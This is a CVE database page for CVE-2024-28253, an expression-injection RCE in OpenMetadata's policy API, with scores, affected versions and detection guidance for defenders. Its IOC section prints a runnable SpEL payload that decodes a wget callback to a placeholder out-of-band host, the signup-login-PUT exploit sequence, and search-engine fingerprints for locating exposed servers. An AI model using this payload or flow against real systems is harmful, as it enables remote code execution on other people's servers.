cbcvebase.
CVE-2024-28253
published 2024-03-15

CVE-2024-28253: OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team…

PriorityP183high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
12.53%
95.7th percentile
OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. `CompiledRule::validateExpression` is also called from `PolicyRepository.prepare`. `prepare()` is called from `EntityRepository.prepareInternal()` which, in turn, gets called from `EntityResource.createOrUpdate()`. Note that even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and therefore after the SpEL expression has been evaluated. In order to reach this method, an attacker can send a PUT request to `/api/v1/policies` which gets handled by `PolicyResource.createOrUpdate()`. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query and is also tracked as `GHSL-2023-252`. This issue may lead to Remote Code Execution and has been addressed in version 1.3.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Affected

1 ranges
VendorProductVersion rangeFixed in
open-metadataopenmetadata< 1.3.11.3.1

Detection & IOCsextracted from sources · hover to see the quote

urlPUT /api/v1/policies
path/api/v1/policies
commandT(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('{{base64("wget http://{{interactsh-url}}")}}')))
othershodan:http.favicon.hash:733091897
otherfofa:icon_hash="733091897"
  • Monitor for unauthenticated or low-privilege PUT requests to /api/v1/policies containing SpEL expressions with Java runtime invocations (e.g., T(java.lang.Runtime).getRuntime().exec) in the 'condition' field of policy rules.
  • The exploit flow involves three steps: (1) POST /api/v1/users/signup to register a new user, (2) POST /api/v1/users/login to obtain a Bearer token, (3) PUT /api/v1/policies with a malicious SpEL condition. Detect this sequence in HTTP logs.
  • Detect the authorization header pattern 'Bearer <token>' on PUT /api/v1/policies requests from newly registered accounts (accounts created moments before the exploit attempt).
  • Look for outbound DNS or HTTP callbacks (OAST/interactsh interactions) originating from OpenMetadata containers following PUT /api/v1/policies requests, indicating successful SpEL RCE.
  • In Kubernetes environments, enumerate OpenMetadata pods and check image versions prior to 1.2.4/1.3.1 as actively exploited targets: kubectl get pods --all-namespaces -o=jsonpath='{range .items[*]}{.spec.containers[*].image}{"\n"}{end}' | grep 'openmetadata'
  • Post-exploitation indicators include cronjob creation for persistence, Netcat reverse shell connections, and outbound connections to a remote server in China for cryptomining payload download.
  • The SpEL injection payload uses Base64-encoded commands passed to T(java.util.Base64).getDecoder().decode() within the 'condition' field — alert on policy rule conditions containing 'T(java.' class references.
  • ·The authorization check (authorizer.authorize()) is called AFTER prepareInternal() and SpEL expression evaluation, meaning even authenticated low-privilege users can trigger RCE before authorization is enforced.
  • ·The vulnerability affects OpenMetadata versions prior to 1.2.4 and 1.3.1. The NVD advisory references fix in 1.3.1 while the BleepingComputer article states patches were available in 1.2.4 and newer — ensure the correct patched version is confirmed for your release branch.
  • ·Default credentials on OpenMetadata deployments increase risk; attackers can self-register new accounts via /api/v1/users/signup (no prior authentication required) to obtain a token for exploitation.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck9.4CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.